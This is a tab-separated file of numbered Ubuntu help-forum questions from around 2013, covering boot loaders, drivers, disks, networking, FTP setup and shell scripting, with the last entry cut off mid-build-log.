358569	steam wo n't open after install	i 've looked all over the place for a solution but no one seems to be getting the same error codes as me . when i try to run steam through terminal i get the following error : running steam on ubuntu 13.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1367621987_client ) installing breakpad exception handler for appid ( steam ) /version ( 1367621987_client ) unlinked 0 orphaned pipes gtk-message : failed to load module `` overlay-scrollbar '' installing breakpad exception handler for appid ( steam ) /version ( 1367621987_client ) [ 1013/104817 : warning : proxy_service.cc ( 646 ) ] pac support disabled because there is no system implementation /home/buildbot/buildslave_steam/steam_rel_client_ubuntu12_linux/build/src/steamui/../common/steam/client_api.cpp ( 281 ) : assertion failed : clientapi_initglobalinstance : internalapi_init_internal failed . assert ( assertion failed : clientapi_initglobalinstance : internalapi_init_internal failed . ) : /home/buildbot/buildslave_steam/steam_rel_client_ubuntu12_linux/build/src/steamui/../common/steam/client_api.cpp:281 installing breakpad exception handler for appid ( steam ) /version ( 1367621987_client ) uploading dump ( out-of-process ) [ proxy '' ] /tmp/dumps/assert_20131013104817_1.dmp /home/buildbot/buildslave_steam/steam_rel_client_ubuntu12_linux/build/src/steamui/steamstartup.cpp ( 627 ) : assertion failed : ! `` there was a problem with your steam installation.\n '' `` please reinstall steam.\n '' unlinked 2 orphaned pipes casynciomanager : 0 threads terminating . 0 reads , 0 writes , 0 deferrals . casynciomanager : 75 single object sleeps , 0 multi object sleeps casynciomanager : 0 single object alertable sleeps , 1 multi object alertable sleeps [ 2013-10-13 10:48:16 ] startup - updater built may 3 2013 15:08:27 [ 2013-10-13 10:48:16 ] verifying installation ... [ 2013-10-13 10:48:16 ] verification complete shutting down . . . [ 2013-10-13 10:48:17 ] shutdown finished uploading minidump ( out-of-process ) : success = yes response : crashid=bp-d172a742-b7dd-419c-b235-d60c32131013 i 've tried sudo apt-get purge and terminal tries to tell me i do n't have steam installed . i 've tried reinstalling with software center but that does n't help either .
358570	operating system missing	i am running windows eight alongside ubuntu 12.04 , using the default gnu grub ( ubuntu loads first then i used to choose windows 8 from the list ) . the computer was running normally , until just now , i booted it up and tried starting windows eight . it gives the following error : operating system not found , try disconnecting disks that may contain an os . note that i was not trying to install/uninstall/repair anything , i just tried to start windows 8 from grub and it gave the error .
358571	will not boot from memory stick	when i try to boot up , i have to press f9 and choose my memory stick . it then shows a blank screen as follows boot : . i do n't know what to type !
358572	`` unable to find a medium containing a live file system '' on samsung np300e4c when booting from usb	i have a notebook model samsung np300e4c-ad2br with windows 8 and i want to install ubuntu with it in dualboot from a pen drive ( usb port , i do n't have a dvd to burn the iso ) . i have already deactivated windows 8 faststartup and the secure boot on the bios . i needed to change the os mode from uefi os to uefi and csm os in order to boot from usb . i created the usb with yumi . when i select to run ubuntu from the usb , at some point , it gives me the message unable to find a medium containing a live file system and never open ubuntu . i have already checked the md5sum and the port is a 2.0 and not 3.0 usb . anyone knows what could be the problem ? i 'm using ubuntu 12.04 64bits version .
358574	usb wifi not connecting after update from ubuntu 10.04 to 12.04	i 've just updated ubuntu from 10.04 to 12.04 . but after update i am unable to connect to my home wifi router . i 've tried connecting it with my android device , it works fine . sometimes it connects to my home wifi but no internet is available . device configuration is below : saquib @ saquib-laptop : ~ $ ifconfig eth0 link encap : ethernet hwaddr e8:11:32:20 : de:7a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:41 base address:0xc000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:3453 errors:0 dropped:0 overruns:0 frame:0 tx packets:3453 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:271550 ( 271.5 kb ) tx bytes:271550 ( 271.5 kb ) wlan0 link encap : ethernet hwaddr 08:10:76 : c5:2b : d2 inet6 addr : fe80 : :a10:76ff : fec5:2bd2/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:37 errors:0 dropped:0 overruns:0 frame:0 tx packets:268 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5276 ( 5.2 kb ) tx bytes:32395 ( 32.3 kb ) saquib @ saquib-laptop : ~ $ iwconfig lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off power management : off eth0 no wireless extensions . saquib @ saquib-laptop : ~ $ rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no saquib @ saquib-laptop : ~ $ sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 06 serial : e8:11:32:20 : de:7a size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:3000 ( size=256 ) memory : fc900000-fc900fff memory : fca04000-fca07fff *-network description : wireless interface physical id : 4 bus info : usb @ 2:1.2 logical name : wlan0 serial : 08:10:76 : c5:2b : d2 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu driverversion=3.2.0-54-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bgn saquib @ saquib-laptop : ~ $ lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) 3f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) 3f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) 3f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) 3f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) 3f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) 3f:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) saquib @ saquib-laptop : ~ $ nm-tool networkmanager tool state : disconnected - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : rtl8192cu state : disconnected default : no hw address : 08:10:76 : c5:2b : d2 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points tp-link_e86b12 : infra , a0 : f3 : c1 : e8:6b:12 , freq 2417 mhz , rate 54 mb/s , strength 99 wpa wpa2 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : e8:11:32:20 : de:7a capabilities : carrier detect : yes wired properties carrier : off
358577	no hdmi audio for msi x370 ubuntu 13.10 64bit	the laptop is msi x370 w/amd-e350 cpu , 4gb ram . http : //www.laptopmag.com/review/laptops/msi-x370.aspx . in the sound device output , there 's only one selection ( built-in speaker ) . what needs to be done to enable hdmi audio output ? the hdmi video displays fine , but sound comes from built-in speakers .
358578	ca n't move a window in unity ( it 's stuck ) !	silly question , but i ca n't move my steam friends list window , the top bar is somehow underneath the main bar of unity at the top . in windows you can right-click ( or shift-click in windows 7 ) and select to 'move ' when a window can be seen directly . something similar possible here ? thanks ,
358579	cd-drive does n't work under ubuntu but works under windows xp !	newb here . cdrom is not accessible . doesnt seem to appear in lshw and there is no /dev/cdrom , and no removable media icon in the system settings . where do i begin ? cdrom works in xp , btw . 12.04 lts ( doh ! sorry , forgot to include the version . )
358582	ca n't write/delete to external usb 12.04 ubuntu	i 'm not a computer guru but i do like the ethos of open source so i use ubuntu for day to day stuff . my interest is photography and i have a large external drive with all my pictures on it . recently my wife pulled the usb out of the computer without unmounting it . i 've tried several of the suggestions here and on google without luck . chmod 777 -r chown root : user /meida/hd-drive it 's fat32 file system . when i try to delete files on the usb it says it 's read only file system . reformatting is n't an option as all my pics are stored there ( a hard lesson for the future ) .
358583	how to install the grub image on a bios_grub partition and esp at the same time ?	i need this to boot from portable gpt hdd on computers of both types ( bios and efi ) .
358584	nemo 2.0 does not render desktop correctly with compiz	i am using ubuntu without unity but with compizan nemo as file manager . since the update to nemo 2.0 it does not render the desktop correctly anymore . instead of the background picture i see a black background and every window movement leaves a strange effect on the desktop : is this is a bug ? where to post nemo bugs . does someone know a workaround ? edit : i have created a bug report here . the problem is , that in nemo 2.0 it 's capability to render the desktop was removed . see here
358585	end_request i/o error , dev sdc sector xxxx - ssd crash ?	i 'm running ubuntu 12.04 and it seems like my ssd is failing on me . after an arbitrary amount of time the disk just prints end_request i/o error , dev sdc sector xxx when i enter a command like ls or anything else . it can happen after 24hours or just a few minutes . all the smart tests ( short/extended ) pass and there are no reallocated sectors , although i 'm not sure if ssds handle it like the older magnetic types . program fail count seems to be the glaring problem in the smart log . 4745980543444 fails ? is that almost 5 trillion ? is there anything i can do especially different than a normal hard disk drive ? === start of information section === device model : m4-ct064m4ssd2 serial number : 0000000011290314d92e lu wwn device id : 5 00a075 10314d92e firmware version : 0009 user capacity : 64,023,257,088 bytes [ 64.0 gb ] sector size : 512 bytes logical/physical device is : not in smartctl database [ for details use : -p showall ] ata version is : 8 ata standard is : ata-8-acs revision 6 local time is : sun oct 13 17:55:36 2013 cest smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x80 ) offline data collection activity was never started . auto offline data collection : enabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 295 ) seconds . offline data collection capabilities : ( 0x7b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 4 ) minutes . conveyance self-test routine recommended polling time : ( 3 ) minutes . sct capabilities : ( 0x003d ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x002f 100 100 050 pre-fail always - 0 5 reallocated_sector_ct 0x0033 100 100 010 pre-fail always - 0 9 power_on_hours 0x0032 100 100 001 old_age always - 5385 12 power_cycle_count 0x0032 100 100 001 old_age always - 563 170 unknown_attribute 0x0033 100 100 010 pre-fail always - 0 171 unknown_attribute 0x0032 100 100 001 old_age always - 0 172 unknown_attribute 0x0032 100 100 001 old_age always - 0 173 unknown_attribute 0x0033 100 100 010 pre-fail always - 22 174 unknown_attribute 0x0032 100 100 001 old_age always - 0 181 program_fail_cnt_total 0x0022 100 100 001 old_age always - 4745980543444 183 runtime_bad_block 0x0032 100 100 001 old_age always - 0 184 end-to-end_error 0x0033 100 100 050 pre-fail always - 0 187 reported_uncorrect 0x0032 100 100 001 old_age always - 0 188 command_timeout 0x0032 100 100 001 old_age always - 0 189 high_fly_writes 0x000e 100 100 001 old_age always - 60 194 temperature_celsius 0x0022 100 100 000 old_age always - 0 195 hardware_ecc_recovered 0x003a 100 100 001 old_age always - 0 196 reallocated_event_count 0x0032 100 100 001 old_age always - 0 197 current_pending_sector 0x0032 100 100 001 old_age always - 0 198 offline_uncorrectable 0x0030 100 100 001 old_age offline - 0 199 udma_crc_error_count 0x0032 100 100 001 old_age always - 0 202 data_address_mark_errs 0x0018 100 100 001 old_age offline - 0 206 flying_height 0x000e 100 100 001 old_age always - 0 smart error log version : 1 no errors logged smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline completed without error 00 % 5385 - # 2 short offline completed without error 00 % 5385 - # 3 extended offline completed without error 00 % 5381 - # 4 vendor ( 0xff ) completed without error 00 % 3907 - # 5 vendor ( 0xff ) completed without error 00 % 3884 - # 6 vendor ( 0xff ) completed without error 00 % 3880 - smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay .
358589	fstab mount new lvg	i am having difficulty auto-mounting my newly created lvg . i tried adding the following line to /etc/fstab : /dev/vgbackup/lvbackup /home/stuart/volume_backup ext3 defaults 0 1 i also tried swapping the /dev/vgbackup/lvbackup with something similar to uuid=f7b9a5e3-4fa3-4bfd-b9af-bf126c296213 based on the id that came up when i manually mounted the drive from nautilus by clicking on the volume ( it showed up in /media ) . unfortunately , with both cases , i get a bootup message telling me that mounting fails and i have to press s to skip . manually mounting the drive from the cli with : sudo mount /dev/vgbackup/lvbackup /home/stuart/volume_backup works though . perhaps fstab is the wrong tool to use ? ideally the drive should be available to write to for the stuart user instead of root . additional info the drive currently uses the ext3 filesystem 3.5tb in size . consists of a 3tb and a 500g physical drives
358590	when i plug my printer the system automatically knows its make and model	does the systems reads the firmware of the device and knows it behavior features and functions or does ubuntu have all the device drivers in a database ?
358591	error installing ubuntu via wubi on windows 8	i get this error : could n't retrieve files from disk image when installing via wubi from an ubuntu iso cd which i previously downloaded . here 's my error log file . it has much information for you .
358593	ubuntu partition is nowhere to be found in dual boot system	i have a dual boot system , win7 in sdb1 and ubuntu in sdb6 , the latter resides on an extended partition . well up until today , update-grub2 would not find a windows partition and today i decide to try and fix that . using the win7 install dvd , i used the dos cmd line to try and fix the error . the suggested methods within askubuntu said to use bootsect /nt60 c : and bootrec /fixboot . these failed for me and pursuing myattempts i also tried bootrec /fixmbr . either that or a filesystem check from the win side , managed to make the ubuntu partition ( sdb6 ) disappear completely . how i see the full disk now : ubuntu @ ubuntu : ~ $ sudo fdisk /dev/sdb command ( m for help ) : p disk /dev/sdb : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders , total 117231408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf2eeea4d device boot start end blocks id system /dev/sdb1 * 2048 65383135 32690544 7 hpfs/ntfs/exfat /dev/sdb2 65384446 117229567 25922561 5 extended /dev/sdb5 92069888 117229567 12579840 82 linux swap / solaris as you can see sdb6 is not even present any longer . from gparted i can see that there exist unallocated space between sector # 's : 65384447 & 92069888 . i tried using gpart to acquire actual sector # in order to then use parted - > rescue , but gpart returns wrong data : ubuntu @ ubuntu : ~ $ sudo gpart /dev/sdb begin scan ... end scan . checking partitions ... ok. guessed primary partition table : primary partition ( 1 ) type : 000 ( 0x00 ) ( unused ) size : 0mb # s ( 0 ) s ( 0-0 ) chs : ( 0/0/0 ) - ( 0/0/0 ) d ( 0/0/0 ) - ( 0/0/0 ) r primary partition ( 2 ) type : 000 ( 0x00 ) ( unused ) size : 0mb # s ( 0 ) s ( 0-0 ) chs : ( 0/0/0 ) - ( 0/0/0 ) d ( 0/0/0 ) - ( 0/0/0 ) r primary partition ( 3 ) type : 000 ( 0x00 ) ( unused ) size : 0mb # s ( 0 ) s ( 0-0 ) chs : ( 0/0/0 ) - ( 0/0/0 ) d ( 0/0/0 ) - ( 0/0/0 ) r primary partition ( 4 ) type : 000 ( 0x00 ) ( unused ) size : 0mb # s ( 0 ) s ( 0-0 ) chs : ( 0/0/0 ) - ( 0/0/0 ) d ( 0/0/0 ) - ( 0/0/0 ) r this could be related to the fact that mbr was last written from windows . i do not know how to proceed though . should i install grub now ( even though there is no ubuntu partition ) and try gpart again afterwards ? if yes , how should i go about it ? is there a walk-through for that ? if no , what else is suggested to do ?
358594	disabling dialogue prompts in ubuntu	i switched from windows to ubuntu a while ago now , but various popup dialogue boxes that prompt for confirmations continue to irritate me . especially the ones when closing a terminal that 's running another process ( `` close this terminal ? : there is still a process running in this terminal . closing the terminal will kill it . '' cancel | close terminal ) , the one about updates that runs intermittently on start up ( `` your ubuntu release is not supported anymore '' ) , and the one when i connect my phone ( `` you have inserted a digital media player '' ) . is there a way to simply disable all pop-up dialogue boxes ? i 'm using 11.10 due to a compatibility issue i had with 12 and a general dislike of 13 .
358597	openprinting printer database not working : does canon ip6700d work please ?	have been trying for several days to get to the printer list at http : //www.openprinting.org , but the page never loads . does anyone know if i can get a canon ip6700d printer working with ubuntu 13.04 please ?
358598	how to remove brosix ?	sorry for creating another question , but other answers ca n't solve my problem . today i installed ubuntu . same goes for brosix - i looked for skype alternative . however , it did not meet my requirements - because i was unable to hear any sound ( even from my music player ) when it was turned on . however , i ca n't find any `` remove '' option . i tried using apt-get ( purge and remove ) , but it failed - it ca n't find brosix . i want to remove it . could anyone please show me the way ? thanks in advance .
358599	plymouth command failed	ubuntu does n't work for me so i need help asap . after have been online on the computer for some minutes this pops up http : //tinypic.com/r/wbs4nd/5 `` plymouth command failed '' . and when that happened . i ca n't do anything on the computer : / i do n't know what 's wrong . i have read a lot of threads but none has worked for me : / i hope someone can help me , thank you
358601	always asks to install or try ?	i already installed ubuntu on my computer , but every time it starts to boot , it asks if i want to try ubuntu or install . do i still need the flash drive containing ubuntu plugged in ( it currently is ) ?
358603	vsftpd - illegal port command	i 'm using a ubuntu server on a virtualbox machine . apache and ssh are working , but ftp after successfully connect to the server and login , it sends a error message : - command : port 127,0,0,1,180,221 - response : 500 illegal port command . - error : failed to retrieve directory listing port forwarding : tcp | host port 2100 | guest port 21 my vstpd.conf file : listen=yes pasv_enable=yes pasv_min_port=2005 pasv_max_port=2010 port_enable=yes anonymous_enable=yes local_enable=yes write_enable=yes anon_upload_enable=yes anon_mkdir_write_enable=yes dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=no ftpd_banner=welcome . chroot_local_user=no chroot_list_enable=yes chroot_list_file=/etc/vsftpd.chroot_list secure_chroot_dir=/var/run/vsftpd/empty pam_service_name=vsftpd rsa_cert_file=/etc/ssl/private/vsftpd.pem
358604	how to boot os after changing hard drive sata ports ?	i have a windows 7 machine with its primary hard drive on sata 0 port ( sda ) . i installed a new hard drive on sata 1 port and then installed ubuntu 12.04 onto this new drive only ( my preferred dual boot setup ) ... my issue now however , is that my system 's bios does not allow me to select sata 1 to boot . i confirmed my grub.cfg file is on the correct drive/partition ( sdb1 ) , but the hardware just is not going there and the windows is booting directly with its own bootloader . i 'm looking for the path of least resistance to get a boot menu that allows me to select which os to boot . on one hand , it would be simple to switch the drives ' sata ports ... however i think i would have to edit the grub.cfg file and reverse hd0 for hd1 and vice versa ... but i 'm not sure that is all that i would need to do for the linux , or if windows will find problems with the change in drive letters it may incur as a result . one option may be to add ubuntu as an option under windows boot menu , but i 'm trying to avoid messing with the windows disk as much as possible . i also considered switching the sata ports , and then just doing the ubuntu install over again on what would then be sda ( leaving windows alone on sdb ) . any suggestions on the least problematic method to pursue here ? and any additional tasks/concerns to perform/consider for either ? thanks . edit : after more research , found various concerns with relocating the windows hard drive to another sata port that would require attention to `` fix '' windows ' various path references . in the end , i used easybcd 2.2 ( latest as of this writing ) which made quick and easy work of simply adding the second drive 's linux installation an option under the windows boot menu . easybcd for some reason listed the drives backward ( drive 0 as linux and drive 1 as windows when in reality its the other way ) , however i was able to add the linux entry to target the /boot partition that i recognized from the linux drive . now can select linux from windows boot menu , which then boots to the grub menu , from where i can select ubuntu .
358605	how do i get help on apt-get 's install subcommand ?	i tried with apt-get help install and apt-get install -- help , but i keep getting the main apt-get help page offering scarce information on the install subcommand : install - install new packages ( pkg is libc6 not libc6.deb ) where could i read on -- no-install-recommends and other available options ?
358612	why video system is so slow and crashes often ?	this happens after an update that changed the system drives . the information charged by the system is contradictory : on one hand , says vesa : m92 is running , on the other hand , says that fglrx is working ! ! also ca n't watch dvd of any kind ! i see this on my term : alberto @ alberto-satellite-l500 : ~ $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati mobility radeon hd 4500 series opengl version string : 3.3.11627 compatibility profile context ... and on my panel from dash : controler vesa : m92 basic experience
358615	several questions about shell scripts	i 'm making a rather big ( at least i think so ) shell script which includes a host side and a target side . the host being an actual computer running linux/various distros and the target being a devkit8000 ( almost the same as a beagleboard ) . the devkit8000 runs on kernel version 3.2.6 . but there are a few things which i have n't been able to do so far , so i 'm hoping some of you can help me out . 1 ) i would like to have all the variables that can be changed by the user in 1 file called `` settings '' , so it 's easier for the user to edit 1 file instead of multiple files . i 've tried to use 'export ' to mark variables , then run the settings.sh script just before running my main script , but the main script ca n't find the exported variables no matter what i do ? 2 ) is it possible to change hardcoded variables while inside a script ? i have some variables that link to files , and i would like for the user to be able to change the name of the files while inside the script , so he wont have to open the file up in a text editor to manually edit them . 3 ) i 've trapped ctrl+c so it restarts my script instead of exitting it . is there any way to simulate the keypress ctrl+c in code ? 4 ) is there a way to make a script non-executable when done manually by the user , but remain executable when executed from another script ? i have several scripts , and i only want the user to be able to execute the `` main '' script , while the `` main '' script can still execute all the sub-scripts . 5 ) my target-side script involves inserting/removing linux kernel modules , and some of these modules have printk functions in them , with a log level high enough to be printed to the screen . this does n't look very good if it prints out messages in the middle of my script . i wish to suppress the messages so they only show up when using 'dmesg ' and dont get printed out to the screen . i was thinking about piping them out to /dev/null , but not sure how about to do it for printk ( seeing as it is n't actually inside my script ) , and would that cause them to not show up in 'dmesg ' ? 6 ) how can i check the return values/error returns for functions ? for example when i use 'ssh user @ target ' and it ca n't connect for some reason . how can i check what the error message was and do something based on that info ? i would like to simply echo something to the user if ssh fails and then not continue with the rest of the script . 7 ) i 've used the 'resize ' function on my host machine script to resize the terminal window so the entire menu can fit on there . that 's fine and it works , but my problem is that on my target , the 'resize ' function is non-existant . so if the target script is called , i ca n't resize the window , meaning the menu could possibly look distorted and ugly . is there any method that works like 'resize ' , or would it be possible for me to add 'resize ' to my target ? 8 ) same as the above with 'resize ' , but this one is for ' $ lineno ' . it is available on my host machine , but not on my target . any other command that works like it , or can i add it manually ? 9 ) a picture is worth 1000 words : http : //i42.tinypic.com/29mahoo.png i would like to fix it , so if a word is seperated at the end of the terminal window , it just jumps down to the next line . that way it looks much better . i know it 's a lot of questions in 1 post , but would rather just add them all up here instead of making more posts . i would love some help , even if it 's only with a few of the questions : )
358616	installation problem : `` you have not selected any partitions for use as swap space '' how may i continue ?	i´m trying to install ubuntu 13.04 in my samsung n210 . i have my disk drive partitioned by default 50 % and 50 % . i´ve found here some nice n00b instructions , for people in my situation ( my first experience with linux ) . when i´ve tried to install it from the usb , it restarted . i´ve found someone with the exact problem . it explains there that there were 4 partitions ( it wouldn´t kill to show the drive letter that identifies it ! ) . i just assume in my case the latest partition is the d drive . i´ve selected it and i´ve stepped with the `` no root file system is defined '' issue . again , i´ve found the solution : i have to slecet the drive and format it as ext4 , and select / as the boot root . but now it tells me that i need 2 partitions to install linux , but i can´t select from the installation window the empty partition ! ( it´s in grey ) . and if i try to continue it appears this message that says `` you have not selected any partitions for use as swap space [ ... ] '' how may i proceed ? thanks for your help ! !
358618	vlc black screen with nvidia driver	after installing the nvidia-304 display driver , whenever i play a video with vlc and scale the window any higher than the native resolution of the video ( or full screen ) , the vlc window goes black . since my display has a resolution of 2560x1600 , this occurs with all videos i watch . this problem does not occur when all other windows are closed . sometimes , if i open another window after vlc and then close it , it still does n't work .
358625	how can i undo adding a ppa and installing packages from it ?	i was following a guide and did this : sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable sudo apt-get update sudo apt-get install cinnamon nemo now i am having a lot of trouble due to this . how can i undo these actions ?
358626	open a downloaded file in chromium directly	i 'm using chromium as a navigator and ubuntu 13.04 as the os . when i download some file from the web and then when i want to open it , the file is n't opened directly , i get redirected to the location of that file , and i 've to open this file from that location . i want when a file is finished from downloading , and i open it to be openned directly , without that redirecting . how can i solve that ? ?
358628	13.04 boots into grub prompt	i have a dell xps 15 '' . i 've been running a dual boot setup for over a year . i recently moved to 13.04 . about a week later my laptop ( which is a work laptop ) was remotely updated by it on the windows side ( i do n't think they know about the ubuntu installation , but another it guy did install it in the first place ) . since the windows update the ubuntu system boots into the grub prompt . i am not sure what to do . i 've tried looking for the initrd file or something , but i ca n't seem to find my linux partitions ... thanks !
358629	why ca n't i connect to the internet with ubuntu 12.04.2 amd 64 vmware virtual machine	i can not connect to the internet with my ubuntu 64-bit virtual machine . i 'm using ubuntu 12.04.2 , a mac book pro with boot camp 5.0.5033 , and windows 7 as my host operating system . before i update to boot camp 5.0.5033 it would corrupt my network card driver and i would have to run the repair from the boot camp disc . now that i upgraded to 5.0.5033 the network is inaccessible except accross the wireless network on my host machine , although as soon as i shutdown the ubuntu virtual machine my wired network is restored after the update to boot camp 5.0.5033 . also i 'm using vmware player 3.1.4 build-385536 .
358633	what does `` ./ '' mean in linux shell ?	what does the command ./ mean ? for example , sometimes we call a file with ./config , sometimes ../config , thanks
358635	ubuntu server utility with sharing windows software	i have a network with a pc server and 3 pc . i wanted to install ubuntu server to share printers , files and programs . the point itâ´s that the 3 machines have winos because of some software that we use on company only work on windows . and my question it 's can i share that programs `` windows only '' through ubuntu server to use on the 3 pc even if they are just for windows ?
358636	can someone give me precise instructions on how to install the compiz stereo3d plugin on ubuntu 13.04	i looked at this link and tried all the instructions http : //ddudek.pl/ ? p=39 first i tried this sudo add-apt-repository ppa : ddudek/stereo3d-stable sudo apt-get update sudo apt-get install compiz-plugin-stereo3d but there was no plugin available then i tried the build for other distro instructions couldnt download the code with this bzr branch lp : compiz-plugin-stereo3d/stable i got bzr : error : already a branch : `` stable '' . dowloaded the source from here peice by piece : http : //bazaar.launchpad.net/~ddudek/compiz-plugin-stereo3d/trunk/files/1/ and followed these instructions cd [ plugin ] mkdir build cd build cmake .. make sudo make install build dependencies are : compiz-dev compiz-plugins-main-dev intltool libgconf2-dev libglib2.0-dev libtool libglu1-mesa-dev libjpeg62-dev libxml2-dev libxslt1-dev pkg-config xsltproc libcairo2-dev libpango1.0-dev librsvg2-dev libsm-dev libdbus-1-dev libdecoration0-dev libboost1.46-dev libboost-serialization1.46-dev cmake but got : : e : package 'libboost1.46-dev ' has no installation candidate e : package 'libboost-serialization1.46-dev ' has no installation candidate and the cmake line wasnt complete so of course it didnt run so if some could help me with step by step instructions i would be very grateful edit ok the cmake .. worked but i got a bunch of error when i tried to make install [ 18 % ] built target stereoscopicoutput_gsettings_schema [ 27 % ] built target compiz_gsettings_compile_local [ 36 % ] building cxx object cmakefiles/stereoscopicoutput.dir/src/stereoscopicoutput.cpp.o in file included from /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.cpp:14:0 : /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.h:98:57 : error : ‘glfragment’ has not been declared /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.h:98:76 : error : expected ‘ , ’ or ‘ ... ’ before ‘ & ’ token /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.h:108:53 : error : ‘glfragment’ has not been declared /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.h:108:72 : error : expected ‘ , ’ or ‘ ... ’ before ‘ & ’ token /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.h:124:53 : error : ‘glfragment’ has not been declared /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.h:124:72 : error : expected ‘ , ’ or ‘ ... ’ before ‘ & ’ token /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.h:128:9 : error : ‘glfragment’ does not name a type /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.h:130:9 : error : ‘glfragment’ does not name a type /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.h:295:21 : error : ‘glfragment’ has not been declared /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.h:295:40 : error : expected ‘ , ’ or ‘ ... ’ before ‘ & ’ token /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.h:301:5 : error : ‘glfragment’ has not been declared /home/w/downloads/stereo-3d-plugin/src/stereoscopicoutput.h:301:28 : error : expected ‘ , ’ or ‘ ... ’ before 